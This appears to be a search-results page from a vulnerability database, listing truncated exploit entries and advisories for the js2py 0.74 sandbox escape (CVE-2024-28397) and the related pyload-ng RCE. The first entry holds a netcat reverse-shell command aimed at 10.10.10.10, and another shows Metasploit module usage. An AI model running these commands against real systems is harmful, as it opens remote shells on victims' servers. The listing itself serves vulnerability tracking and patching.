19 matches found
Js2Py 0.74 - RCE
Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...
📄 js2py 0.74 Automated Sandbox Escape / Code Execution
js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell. ============================================================================================================================================= | Title : js2py v0.74 Automated Sandbox Escape & Revers...
Exploit for CVE-2024-28397
🚨 Remote Code Execution – CVE-2024-28397 pyload-ng / js2py...
Linux Distros Unpatched Vulnerability : CVE-2024-28397
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. CVE-2024-28397 Note that...
Exploit for CVE-2024-28397
CVE-2024-28397-command-execution-poc This vulnerability arises...
Pyload Remote Code Execution Exploit
CVE-2024-28397 is a sandbox escape in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape...
Pyload Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'Pyload RCE CVE-2024-39205 with js2py sandbox escape CVE-2024-28397', 'Description' = %q CVE-2024-28397 is sandbox escape ...
Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
CVE-2024-28397 is sandbox escape in js2py use exploit/linux/http/pyloadjs2pycve202439205 msf exploitpyloadjs2pycve202439205 show targets ...targets... msf exploitpyloadjs2pycve202439205 set TARGET msf exploitpyloadjs2pycve202439205 show options ...show and set options... msf...
GHSA-R9PP-R4XF-597R pyload-ng vulnerable to RCE with js2py sandbox escape
Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...
pyload-ng vulnerable to RCE with js2py sandbox escape
Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...
openSUSE Security Advisory (SUSE-SU-2024:2272-1)
The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
Mageia: Security Advisory (MGASA-2024-0256)
The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
openSUSE 15 Security Update : python-Js2Py (SUSE-SU-2024:2272-1)
The remote openSUSE 15 host has a package installed that is affected by a vulnerability as referenced in the SUSE- SU-2024:2272-1 advisory. - CVE-2024-28397: Fixed a potential sandbox escape via untrusted JavaScript code bsc1226660. Tenable has extracted the preceding description block directly...
SUSE-SU-2024:2272-1 Security update for python-Js2Py
This update for python-Js2Py fixes the following issues: - CVE-2024-28397: Fixed a potential sandbox escape via untrusted JavaScript code bsc1226660...
Exploit for CVE-2024-28397
Perkenalan 中文 js2py is a popular python...
CVE-2024-28397
An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call...
CVE-2024-28397
An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call...
CVE-2024-28397
creationtimestamp| type| source ---|---|--- 2024-06-19 19:08:33+00:00| published-proof-of-concept| https://t.me/proxybar/2126 2024-06-20 11:31:03+00:00| published-proof-of-concept| https://t.me/CNArsenal/2690 2024-06-20 14:26:37+00:00| published-proof-of-concept|...
Exploit for CVE-2024-28397
Introduction 中文 Analysis Chinese./an...